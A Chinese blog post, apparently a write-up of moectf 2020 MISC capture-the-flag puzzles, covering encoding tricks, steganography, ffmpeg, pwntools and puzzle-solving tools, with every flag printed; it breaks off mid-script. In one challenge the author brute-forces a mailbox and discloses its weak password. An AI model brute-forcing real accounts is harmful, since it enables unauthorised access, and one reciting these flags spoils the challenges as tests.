srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007205858294" style="zoom:67%;"><p>这个题目刚开始出bug了,,,</p><h4 id="bug版"><a href="#bug版" class="headerlink" title="bug版"></a>bug版</h4><p>下载下来是一个zip文件,解压带密码,但是不能用伪密码绕过。无奈之下,扔进winhex瞅瞅,然后就找到这么一串东西:</p><p><img src="/images/2020moectf-MISC/image-20201007210049127.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007210049127.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007210049127"></p><p>一看就是base64,,,在线解码,,盲猜url编码</p><h4 id="正确版"><a href="#正确版" class="headerlink" title="正确版"></a>正确版</h4><p>下载下来是一个zip,但是打不开,,,</p><p><img src="/images/2020moectf-MISC/image-20201007210421836.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007210421836.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007210421836"></p><p>扔进ultra editor,发现文件头不对,,,补个文件头</p><p><img src="/images/2020moectf-MISC/image-20201007210523877.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007210523877.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007210523877"></p><p>然后解压出来是个图片</p><p><img src="/images/2020moectf-MISC/flag.jpg" class="lazyload" data-srcset="/images/2020moectf-MISC/flag.jpg" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII="></p><p>然后就跟bug版一样了</p><blockquote><p>密文:bW9lY3RmJTdCSnVzN19jNmFuOWVfQF9iMXQlMjElN0Q=</p><p>解密: moectf%7BJus7_c6an9e_@_b1t%21%7D </p><p>再解密:moectf{Jus7_c6an9e_@_b1t!}</p></blockquote><h3 id="不-会-吧-?-就-这-¿"><a href="#不-会-吧-?-就-这-¿" class="headerlink" title="不 会 吧 ? 就 这 ¿"></a>不 会 吧 ? 就 这 ¿</h3><img src="/images/2020moectf-MISC/image-20201007203957662.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007203957662.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007203957662" style="zoom:67%;"><p>阴阳怪气编码,,,,</p><p>附件下载下来就是这个猫猫头,,,</p><p>binwalk分离:</p><p><img src="/images/2020moectf-MISC/image-20201007211144714.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007211144714.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007211144714"></p><p>肯定是一个什么编码,,,换成0和1。因为只有两种内容,所以要么是二进制,要么是摩斯。尝试一下摩斯,不行,那就是二进制和ASCII码结合,,,这里写了一个C程序:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="built_in">string</span> flag=<span class="string">" "</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">1</span>;;j++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">int</span> ans=<span class="number">0</span>;</span><br><span class="line"><span class="built_in">string</span> a;</span><br><span class="line"><span class="built_in">cin</span>>>a;</span><br><span class="line"><span class="keyword">if</span>(a[<span class="number">0</span>]==<span class="string">'#'</span>) <span class="comment">//用于停止循环</span></span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<a.size();i++)</span><br><span class="line"><span class="keyword">if</span>(a[i]==<span class="string">'.'</span>)</span><br><span class="line">ans=ans+<span class="built_in">pow</span>(<span class="number">2</span>,i);</span><br><span class="line"><span class="keyword">char</span> rel=ans; </span><br><span class="line"><span class="comment">//cout<<ans<<" : "<<rel<<"\n";</span></span><br><span class="line">flag[j]=rel;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<flag;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>然后把转换后的内容输进去就有答案啦~~</p><p><img src="/images/2020moectf-MISC/image-20201007221949248.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007221949248.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007221949248"></p><blockquote><p>moectf{Y0u_wh4t?-0n1y_th1S?}</p></blockquote><h3 id="Cor1e的支票"><a href="#Cor1e的支票" class="headerlink" title="Cor1e的支票"></a>Cor1e的支票</h3><img src="/images/2020moectf-MISC/image-20201007222055487.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007222055487.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007222055487" style="zoom:67%;"><p>附件下载下来打开是这个亚子:</p><blockquote><p>。。。。。。。。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。。。。。。。。。?。?!。?。。。。。。。。。。。。。。。。。。!。。。。。!。?。。。。。。。!?!!。?!!!!!!?。?!。?!!!。!!!!!。?。。。。。。。。。!?!!。?。。。。。。。。?。?!。?。。!。?。。。。。。。!?!!。?!!!!!!?。?!。?!!!!!!!!!!!。?。。。。。。。。。!?!!。?。。。。。。。。?。?!。?。。。。。。。。。。!。?。。。。。。。。。!?!!。?!!!!!!!!?。?!。?!!!!!!!!!!!!!!!!!。?。。。。。。。!?!!。?。。。。。。?。?!。?。。。。。。!。。。。。。。!。?。。。。。。。。。。。。。。。。。!?!!。?!!!!!!!!!!!!!!!!?。?!。?!!!。?。。。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。。。?。?!。?。。。。。。!。!!!!!!!!!!!!!。?。。。。。。。。。。。!?!!。?!!!!!!!!!!?。?!。?!!!!!!!!!!!。?。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。?。?!。?。。。。。。。。。。。。。。。。。。!。?。。。。。。。。。。。。。!?!!。?!!!!!!!!!!!!?。?!。?!!!!!!!!!!!!!。?。。。。。。。。。。。!?!!。?。。。。。。。。。。?。?!。?。。。。!。。。。。。。。。。。。。!。?。。。。。。。。。。。。。。。!?!!。?!!!!!!!!!!!!!!?。?!。?!!!。?。。。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。。。?。?!。?。。。。。。。。。。。。。。。。。。。。。。。。。。!。!!!!!!!!!!!!!!!!!。!!!!!!!!!。!!!!!!!!!!!!!。?。。。。。。。。。。。。。!?!!。?!!!!!!!!!!!!?。?!。?!!!!!!!!!!!!!!!!!!!!!。?。。。。。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。。。。。?。?!。?。。。。!。?。。。。。。。。。!?!!。?!!!!!!!!?。?!。?!!!!!!!!!。?。。。。。。。。。。。!?!!。?!!!!!!!!!!?。?!。?!!!!!!!。?。。。。。。。!?!!。?。。。。。。?。?!。?。。。。。。。。!。?。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。?。?!。?。。。。。。。。。。。。。。。。。。!。?。</p></blockquote><p>emmm……….肯定是一个编码啊,,,然后查一下,,,发现有一个编码叫做Ook编码和前面的Brain fuck一个作者,,,然后加上Ook,在线解码:</p><blockquote><p>moectf{cor1e_AnD_e3qie_1s_CP}</p><p>内心OS:#<em>?!</em>#$@?@**!@%#%^&@%@# </p></blockquote><h3 id="简单的社工题目"><a href="#简单的社工题目" class="headerlink" title="简单的社工题目"></a>简单的社工题目</h3><img src="/images/2020moectf-MISC/image-20201007223009055.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007223009055.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007223009055" style="zoom:67%;"><p>这个题狠毒瘤,,,</p><img src="/images/2020moectf-MISC/3.jpg" class="lazyload" data-srcset="/images/2020moectf-MISC/3.jpg" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" style="zoom: 33%;"><img src="/images/2020moectf-MISC/1.jpg" class="lazyload" data-srcset="/images/2020moectf-MISC/1.jpg" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" style="zoom: 33%;"><img src="/images/2020moectf-MISC/2.jpg" class="lazyload" data-srcset="/images/2020moectf-MISC/2.jpg" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" style="zoom: 33%;"><p>第三个图片,,,他的关注,你逆着看: <a href="mailto:923431@ourmail.cn">923431@ourmail.cn</a> ,进去后要输入密码,这里我是爆破出来的,但是其实是弱口令:a123456,进去了后看到一串神秘代码:<img src="/images/2020moectf-MISC/image-20201008004540729.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008004540729.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008004540729"></p><p>底下还有个这个:<img src="/images/2020moectf-MISC/image-20201008004740017.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008004740017.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008004740017"></p><p>盲猜百度网盘(其实我开hint了,,,然后就可以得到flag了</p><h3 id="A3FXCK"><a href="#A3FXCK" class="headerlink" title="A3FXCK"></a>A3FXCK</h3><img src="/images/2020moectf-MISC/image-20201008004931193.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008004931193.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008004931193" style="zoom:67%;"><p>下载是一个图片,binwalk干他!!!</p><p><img src="/images/2020moectf-MISC/image-20201008005211185.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008005211185.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008005211185"></p><p>然后发现这样一个东西:</p><blockquote><p>luoq1an -> 1 ->[</p><p>arttnba2 -> 2 ->]</p><p>arttnba3 -> 3 ->(</p><p>luoqi4n -> 4 ->)</p><p>arttnba5 -> 5 -> +</p><p>arttnba6 -> 6 -> !</p></blockquote><p>代换以后,根据“<a href></a>+!”这6个符号以及题干信息,知道这是JS fuck编码,再浏览器的控制台里或者在线解密一下:</p><blockquote><p>moectf{J5Fxck_1s_1nt3res7in9!}</p></blockquote><h3 id="⑨的完美教室"><a href="#⑨的完美教室" class="headerlink" title="⑨的完美教室"></a>⑨的完美教室</h3><img src="/images/2020moectf-MISC/image-20201008005851888.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008005851888.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008005851888" style="zoom: 67%;"><p>我觉得这个题是真的毒瘤,,,</p><p>看到nc连上去:<img src="/images/2020moectf-MISC/image-20201008010003791.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008010003791.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008010003791"></p><p>???</p><p>数学不好???</p><p>然后发现一直输入9,,,没有任何问题</p><p>我就很懵逼,还社工了一下这个动漫人物。。。。。</p><p>开了hint才知道,,,这TM就是一个pwn题</p><p><img src="/images/2020moectf-MISC/image-20201008010246041.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008010246041.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008010246041"></p><p><img src="/images/2020moectf-MISC/image-20201008010211135.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008010211135.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008010211135"></p><p>真的艹,,,这个题</p><p>上脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">'sec.arttnba3.cn'</span>,<span class="number">10001</span>)</span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">recv = p.recv()</span><br><span class="line">p.sendline(<span class="string">'9'</span>)</span><br><span class="line"><span class="keyword">if</span> <span class="string">b'ctf'</span> <span class="keyword">in</span> recv:</span><br><span class="line">print(recv)</span><br><span class="line"><span class="keyword">break</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>挂一下某个毒瘤出题人</p><p><img src="/images/2020moectf-MISC/[email protected]" class="lazyload" data-srcset="/images/2020moectf-MISC/[email protected]" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="img"></p><blockquote><p>moectf{c1rn0_1s_tH3_5tr0n9est!}</p></blockquote><h3 id="停不下来了啊啊啊啊啊啊啊"><a href="#停不下来了啊啊啊啊啊啊啊" class="headerlink" title="停不下来了啊啊啊啊啊啊啊"></a>停不下来了啊啊啊啊啊啊啊</h3><img src="/images/2020moectf-MISC/image-20201008010802177.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008010802177.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008010802177" style="zoom:67%;"><p>这题能把人笑死,,,</p><p>下载下来是一个视频,然后唱了一会歌,就听他“啊啊啊啊啊~~”,,,</p><p>突然看到一道黑影一闪而过,,,嗯?好像是个flag?拖到Pr里面一帧一帧的看,,,看到了!!!</p><p><img src="/images/2020moectf-MISC/image-20201008011031442.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008011031442.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008011031442"></p><p>艹,,,才一点,但最起码思路正确,然后一看全长:4h,,,瞬间自闭</p><p>但u1s1,hint还是很给力的,,,下载ffmpeg,侦测黑场帧,百度了老久用法,,,</p><blockquote><p>$ ffmpeg -loglevel info -i final.mp4 -vf blackframe=95:30 -f null -</p></blockquote><p>然后把结果复制下来:</p><p><img src="/images/2020moectf-MISC/image-20201008011320422.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008011320422.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008011320422"></p><p>但是哟一个问题,,这里的黑场帧对应的是时间戳(实在找不到显示帧数或者时间的方法),,,于是只能用时间戳en上,看一眼视频帧率30,那就用时间戳/帧率就是秒数,再转化时间,在那个大致范围里面一点一点找,,,(还是在啊~~)最后终于集齐龙珠,召唤神龙(bushi,获得flag</p><blockquote><p>moectf{G0d_Of-Vid3o+Edit1ng_AnD_ffmp3G}</p></blockquote><h3 id="星空"><a href="#星空" class="headerlink" title="星空"></a>星空</h3><img src="/images/2020moectf-MISC/image-20201008012931570.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008012931570.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008012931570" style="zoom:67%;"><p>下载下来解压是一张图片,binwalk分离,然后发现420张图片……woc这是在考察我5岁之前的技能啊——拼图,但是手拼有失水准(其实是根本拼不来。所以这个题,需要用一个工具:gaps,这个东西环境比较难安装(windows辣鸡……</p><p>我是在我的虚拟机上安装的,然后先用montage把这些块块拼成一个图片,然后再用gaps拼图……</p><blockquote><p>montage *jpg -geometry 100x100+0+0 out2.jpg</p><p>gaps –image out2.jpg –generations 2000 –population 420 –size 100</p></blockquote><p>当时github上面readme的指令没一个能用……readme辣鸡。然后只能靠百度了,搜了老久,然后自己手调才试出来的……</p><p>但是,不管怎么调整参数,拼图始终不能完美,,最好的结果就是这个:</p><p><img src="/images/2020moectf-MISC/sky.png" class="lazyload" data-srcset="/images/2020moectf-MISC/sky.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII="></p><p>还好我不是电竞选手:</p><blockquote><p>moectf{thE_5t@rrY_sKy_1s_ReAlly_beauTifuL}</p></blockquote><h3 id="Osu-Master"><a href="#Osu-Master" class="headerlink" title="Osu! Master!"></a>Osu! Master!</h3><img src="/images/2020moectf-MISC/image-20201008014757932.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008014757932.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008014757932" style="zoom:67%;"><p>之前打过osu,,但是我太菜了……所以就把osu卸载了,然后为了做题又安装上了。</p><p>下载附件是一个osu的谱子,进去打一打~~发现谱子上有一个moectf的黑旗子在闪烁,盲猜morse。但是……这个工具人好难啊,,然后在RX大佬的引导下,学习了osu制谱里面的Osu story board文件结构:在.osb文件里里面写着图片闪烁的时间参数,把他提取出来,发现图片显示的时间持续在270或者540,然后间隔的时间是270或者810,于是我手动把里面所有时间参数dump下来,然后写了一个转化成morse密文的py脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change</span>(<span class="params">a,b</span>):</span></span><br><span class="line"><span class="keyword">if</span>(b-a==<span class="number">270</span>):</span><br><span class="line"><span class="keyword">return</span> <span class="string">'.'</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"><span class="keyword">return</span> <span class="string">'-'</span></span><br><span class="line">dic=[<span class="number">2133</span>,<span class="number">2673</span>,<span class="number">2943</span>,<span class="number">3213</span>,<span class="number">3483</span>,<span class="number">4023</span>,<span class="number">4293</span>,<span class="number">4833</span>,<span class="number">5643</span>,<span class="number">6183</span>,<span class="number">6453</span>,<span class="number">6993</span>,<span class="number">7263</span>,<span class="number">7803</span>,<span class="number">8613</span>,<span class="number">8883</span>,<span class="number">9153</span>,<span class="number">9423</span>,<span class="number">9693</span>,<span class="number">10233</span>,<span class="number">11043</span>,<span class="number">11313</span>,<span class="number">11583</span>,<span class="number">12123</span>,<span class="number">12933</span>,<span class="number">13203</span>,<span class="number">13473</span>,<span class="number">14013</span>,<span class="number">14283</span>,<span class="number">14553</span>,<span class="number">15363</span>,<span class="number">15633</span>,<span class="number">16443</span>,<span class="number">16983</span>,<span class="number">17253</span>,<span class="number">17793</span>,<span class="number">18063</span>,<span class="number">18603</span>,<span class="number">19413</span>,<span class="number">19683</span>,<span class="number">19953</span>,<span class="number">20223</span>,<span class="number">20493</span>,<span class="number">20763</span>,<span class="number">21573</span>,<span class="number">21843</span>,<span class="number">22113</span>,<span class="number">22383</span>,<span class="number">22653</span>,<span class="number">23193</span>,<span class="number">24003</span>,<span class="number">24543</span>,<span class="number">24813</span>,<span class="number">25353</span>,<span class="number">26163</span>,<span class="number">26433</span>,<span class="number">26703</span>,<span class="number">27243</span>,<span class="number">28053</span>,<span class="number">28323</span>,<span class="number">28593</span>,<span class="number">28863</span>,<span class="number">29133</span>,<span class="number">29403</span>,<span class="number">30213</span>,<span class="number">30753</span>,<span class="number">31563</span>,<span class="number">31833</span>,<span class="number">32643</span>,<span class="number">32913</span>,<span class="number">33183</span>,<span class="number">33723</span>,<span class="number">33993</span>,<span class="number">34263</span>,<span class="number">35073</span>,<span class="number">35343</span>,<span class="number">35613</span>,<span class="number">35883</span>,<span class="number">36153</span>,<span class="number">36423</span>,<span class="number">37233</span>,<span class="number">37773</span>,<span class="number">38043</span>,<span class="number">38583</span>,<span class="number">38853</span>,<span class="number">39393</span>,<span class="number">40203</span>,<span class="number">40473</span>,<span class="number">40743</span>,<span class="number">41013</span>,<span class="number">41283</span>,<span class="number">41553</span>,<span class="number">42363</span>,<span class="number">42903</span>,<span class="number">43173</span>,<span class="number">43713</span>,<span 